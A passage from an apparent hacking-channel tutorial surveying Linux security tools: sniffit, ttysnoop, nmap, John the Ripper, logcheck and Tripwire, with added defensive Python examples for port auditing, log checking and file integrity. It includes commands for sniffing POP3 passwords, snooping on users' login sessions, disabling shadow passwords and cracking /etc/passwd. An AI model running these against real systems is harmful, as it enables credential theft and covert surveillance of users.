3) Its most common use is by an attacker, who captures the traffic on your ports 23 (telnet) and 110 (pop3) and obtains login passwords and mail account passwords with no effort. Sniffit is essentially a vandal's tool, but if you want to know how to strengthen the security of your site, you should first know the tools intruders use.

4) sniffit's homepage is at http://reptile.rug.ac.be/~coder/sniffit/sniffit.html and you can download the latest version from there. Installation is very easy: run #tar xvfz sniff* in the root directory to unpack all files into the corresponding directories.



🦑 Linux Network-Tools PART 2:
> You can run sniffit -i for an interactive, curses-based interface that shows all input/output on the specified network interface:

🦑 LETS START:

1) For example, to capture the pop3 account names and passwords that users enter when fetching mail through the host a.b.c.d (an IP address), run
#sniffit -p 110 -t a.b.c.d &
#sniffit -p 110 -s a.b.c.d &
The format of the resulting log files is described in the documentation under /usr/doc/sniffit*:

2) Each log file is named after the client's IP address, its random high port number, and the IP address and port of the interface being monitored. This exploits an inherent weakness of the TCP/IP protocols as used by telnet and pop3: user names and passwords are transmitted in plain text, without any encryption. So use ssh/scp instead of telnet/ftp. What sniffit captures from an ssh/scp session is essentially a stream of garbage, so you need not worry about the user name and password transmitted over ssh being stolen by a third party. The same reasoning applies to mail: use pop3s/imaps (or POP3/IMAP with STARTTLS) rather than plain pop3.

3) ttysnoop (s)
ttysnoop is a program that redirects all input / output to one terminal number to another terminal. At present, the website I know of is http://uscan.cjb.net , but I can't connect to it all the time. I got ttysnoop-0.12c-5 from other channels, and the address is http://rpmfind.net/linux /RPM/contrib/libc6/i386/ttysnoop-0.12c-5.i386.html This version does not seem to support shadow password. After installation, you need to manually create the directory / var / spool / ttysnoop to test this program is interesting, below Related instructions:

4) First change the in.telnetd entry in /etc/inetd.conf so that the login program it calls is /sbin/ttysnoops by default, as follows:
[root@jephe /etc]# more inetd.conf | grep in.telnetd
telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd -L /sbin/ttysnoops

5) Be sure to run killall -HUP inetd after the change to make it take effect. Make sure shadow passwords are not in use; run #pwunconv to disable them.
Then edit the file /etc/snooptab to set up the default configuration:
[root@jephe /etc]# more snooptab
ttyS1 /dev/tty7 login /bin/login
ttyS2 /dev/tty8 login /bin/login
* socket login /bin/login
------

6) Finally, if someone has logged in on a terminal (you can use the w command to see which terminal it is on) and the terminal device is, say, ttyp0, you can log in to the server and type # /bin/ttysnoop ttyp0 (it prompts for the root password; again, as mentioned above, this version does not support shadow passwords) to monitor that user's login session.

🦑 nmap
nmap is a tool for port scanning relatively large networks. It detects which TCP/IP ports are currently open on a server, so you can run it to verify that unsafe ports that should not be open are in fact blocked.
nmap's homepage at http://www.insecure.org/nmap/index.html gives a simple example:

[root@sh-proxy /etc]# /usr/local/bin/nmap public.sta.net.cn

Starting nmap V. 2.12 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
Interesting ports on public.sta.net.cn (202.96.199.97):
Port    State   Protocol   Service
21      open    tcp        ftp
23      open    tcp        telnet
25      open    tcp        smtp
109     open    tcp        pop-2
110     open    tcp        pop-3
143     open    tcp        imap2
513     open    tcp        login
514     open    tcp        shell
7000    open    tcp        afs3-fileserver

Nmap run completed -- 1 IP address (1 host up) scanned in 15 seconds
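To turn a scan like the one above into the "which unsafe ports are still open" check the text recommends, here is an added example (not from the original post or from nmap itself) that parses the nmap 2.x "Port State Protocol Service" table and flags open TCP ports whose services send credentials in clear text or belong to the legacy r-services. The sample output and the reasons table are constructed for the demonstration.

```python
import re

# Services an administrator would normally close or replace (constructed
# table; the reasons echo the telnet/pop3 -> ssh advice given above).
RISKY_PORTS = {
    21: "ftp: clear-text login, prefer scp/sftp",
    23: "telnet: clear-text login, prefer ssh",
    109: "pop-2: clear-text login",
    110: "pop-3: clear-text login, prefer pop3s or an ssh tunnel",
    143: "imap: clear-text login, prefer imaps",
    513: "rlogin: host-trust based r-service",
    514: "rsh: host-trust based r-service",
}

# One table row as nmap 2.x prints it, e.g. "110 open tcp pop-3"
ROW_RE = re.compile(r"^\s*(\d+)\s+(\w+)\s+(\w+)\s+(\S+)\s*$")


def parse_nmap_table(text):
    """Return (port, state, protocol, service) tuples from nmap 2.x output."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:  # header and banner lines do not start with a port number
            rows.append((int(m.group(1)), m.group(2), m.group(3), m.group(4)))
    return rows


def audit(text):
    """Return [(port, service, reason)] for open TCP ports that are risky."""
    findings = []
    for port, state, proto, service in parse_nmap_table(text):
        if state == "open" and proto == "tcp" and port in RISKY_PORTS:
            findings.append((port, service, RISKY_PORTS[port]))
    return findings


# Constructed sample in the format of the scan shown above (not a real host).
SAMPLE = """\
Interesting ports on host.example (192.0.2.10):
Port State Protocol Service
21 open tcp ftp
22 open tcp ssh
23 open tcp telnet
110 open tcp pop-3
514 open tcp shell
"""

if __name__ == "__main__":
    for port, service, reason in audit(SAMPLE):
        print(f"port {port}/tcp ({service}): {reason}")
```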


🦑 John the Ripper

1) In Linux, passwords are stored in hashed form. You cannot recover the password from the stored hash in the reverse direction, but you can hash a set of words and compare; if a hash matches, the password has been guessed. Therefore it is critical to have a password that is difficult to guess. In general you must not use a dictionary word as a password, as it is quite easy to guess. Likewise, common regular alphanumeric sequences such as 123abc must not be used as passwords.
2) John the Ripper is an efficient and easy-to-use password guessing program: http://www.openwall.com/john/
Download the tar.gz program for UNIX, then use tar xvfz john*.tar.gz to extract it into any directory. Enter the src directory and type make linux-x86-any-elf (I use redhat 6.1); several executables are generated in the run directory, including the main program john. Now run ./john /etc/passwd to crack the passwords.

> John can also crack passwords generated by htpasswd for Apache user authentication. If you create a user with htpasswd -c apachepasswd user and set a password, you can use john apachepasswd to guess it. John prints each guessed password to the terminal and stores it in the john.pot file.


🦑 Another password cracker is the classic Crack that everyone knows. Its homepage is at http://www.users.dircon.co.uk/~crypto/II .

1) Logcheck

Logcheck is a tool that automatically checks the system logs for security intrusion events and abnormal activity. It analyzes various Linux log files,
such as /var/log/messages, /var/log/secure and /var/log/maillog, generates a report of entries that may indicate security problems, and automatically emails it to the administrator. You can set it to run hourly or daily with crond.

2) The homepage of the logcheck tool is at http://www.psionic.com/abacus/logcheck/ After downloading, use tar xvfz logcheck* to extract it into a temporary directory such as /tmp, then run ./make linux to install the corresponding files into /usr/local/etc, /usr/local/bin/ and other directories. Change settings such as who receives the email notifications (the root account by default); you can set root's email alias to a group of people. Also change the settings to ignore certain types of messages, such as plug-gw entries in your mail log: plug-gw does a reverse IP lookup and, if it fails, logs a warning to /var/log/maillog, and logcheck reports all of these warnings by default. You can suppress them through its ignore configuration.

3) Using logcheck to analyze all your log files saves you from checking them manually every day, saving time and improving efficiency.
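The report-versus-ignore scheme described above, as an added example (not logcheck's own code): every line is first tested against an ignore list (here the plug-gw reverse-lookup warnings), and only lines that survive and match a violation pattern are reported. The patterns and the syslog-style sample lines are constructed for the demonstration, not taken from a real host.

```python
import re

# Patterns that should be reported (constructed, in logcheck's spirit).
VIOLATION_PATTERNS = [
    r"authentication failure",
    r"FAILED LOGIN",
    r"Illegal user",
    r"su: .* FAILED",
    r"refused connect",
]

# Messages to suppress, like telling logcheck to ignore plug-gw's
# reverse-lookup warnings mentioned above. Checked before the violations.
IGNORE_PATTERNS = [
    r"plug-gw.*reverse lookup",
    r"CRON\[\d+\]: \(root\) CMD",
]


def compile_all(patterns):
    return [re.compile(p, re.IGNORECASE) for p in patterns]


def check_log(lines, violations=VIOLATION_PATTERNS, ignores=IGNORE_PATTERNS):
    """Return the lines worth emailing: ignored lines are dropped first,
    then anything matching a violation pattern is kept in original order."""
    viol = compile_all(violations)
    ign = compile_all(ignores)
    report = []
    for line in lines:
        if any(p.search(line) for p in ign):
            continue
        if any(p.search(line) for p in viol):
            report.append(line)
    return report


# Constructed sample lines in syslog format.
SAMPLE_LOG = [
    "Jan 10 03:15:01 host CRON[1234]: (root) CMD (run-parts /etc/cron.hourly)",
    "Jan 10 03:15:07 host login[1250]: FAILED LOGIN 1 FROM 192.0.2.5 FOR bob",
    "Jan 10 03:15:09 host plug-gw[1260]: reverse lookup of 192.0.2.5 failed",
    "Jan 10 03:16:42 host su: pam_unix(su:auth): authentication failure; user=alice",
    "Jan 10 03:17:00 host sshd[1300]: Accepted publickey for alice",
]

if __name__ == "__main__":
    for line in check_log(SAMPLE_LOG):
        print("SECURITY:", line)
```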

4) Tripwire

Tripwire is a very useful tool for verifying file integrity. You can define which files/directories need to be checked, but the default settings meet most requirements. It runs in four modes: database generation, database update, file integrity check, and interactive database update. When the initial database is generated, it records various information about the existing files in a database file. If your system files or configuration files are later changed, replaced or deleted, whether accidentally or not, the daily comparison of the existing files against the original database finds out which files have changed, and from the emailed results you can judge whether there has been an unexpected event such as a system intrusion.

5) Tripwire's homepage is at http://www.tripwiresecurity.com, and you can use tripwire-1.2.3 for free. If you use Redhat Linux 6.1, you can also get the latest Tripwire-1.2.3 rebuilt for 6.1
(http://rufus.w3.org/linux/RPM/powertools/6.1/i386/tripwire-1.2-3.i386.html).

6) When you manually change a configuration file or program in the system, you can regenerate the database files by hand: run tripwire-initialize to create the databases directory under the current directory and generate a new system database file there, then cp it to the /var/spool/tripwire directory to overwrite the old one.
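The two steps the text describes, database generation and the later integrity check, as an added example (not Tripwire's own code): snapshot() records a SHA-256 digest, size and mode per file, and compare() reports which paths changed, appeared or disappeared. The files and the edits made to them are constructed in a temporary directory.

```python
import hashlib
import os
import tempfile


def snapshot(root):
    """Database generation: map relative path -> (sha256, size, mode)."""
    db = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            st = os.stat(full)
            with open(full, "rb") as fh:
                digest = hashlib.sha256(fh.read()).hexdigest()
            db[os.path.relpath(full, root)] = (digest, st.st_size, st.st_mode & 0o7777)
    return db


def compare(old, new):
    """Integrity check: which paths were changed, added or deleted."""
    return {
        "changed": sorted(p for p in old if p in new and old[p] != new[p]),
        "added": sorted(p for p in new if p not in old),
        "deleted": sorted(p for p in old if p not in new),
    }


def write(path, text, mode="w"):
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, mode) as fh:
        fh.write(text)


def demo():
    """Constructed scenario: initialise the database, alter the tree, re-check."""
    with tempfile.TemporaryDirectory() as root:
        write(os.path.join(root, "etc/passwd"), "root:x:0:0:root:/root:/bin/bash\n")
        write(os.path.join(root, "etc/inetd.conf"), "telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd\n")
        baseline = snapshot(root)  # the tripwire-initialize step
        # Edits that the daily comparison should pick up:
        write(os.path.join(root, "etc/passwd"), "backup:x:1001:1001::/home/backup:/bin/sh\n", "a")
        os.remove(os.path.join(root, "etc/inetd.conf"))
        write(os.path.join(root, "etc/motd"), "maintenance tonight\n")
        return compare(baseline, snapshot(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```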

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 2020: The Mobile Security Testing Guide (MSTG) is a comprehensive manual for mobile app security development, testing and reverse engineering:
T.me/UnderCodeTesting

🦑 LETS START:

1) git clone https://github.com/OWASP/owasp-mstg/

2) cd owasp-mstg/Tools/

3) ./generate_document.sh

4) Clone the repository and run the gitbook generator.

🦑 This produces PDF, Epub and Mobi files in the "Generated" subdirectory.

1) git clone https://github.com/OWASP/owasp-mstg/

2) cd owasp-mstg/Tools/

3) ./gitbookandpdf.sh

See the same git repository for more.

@UndercOdeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁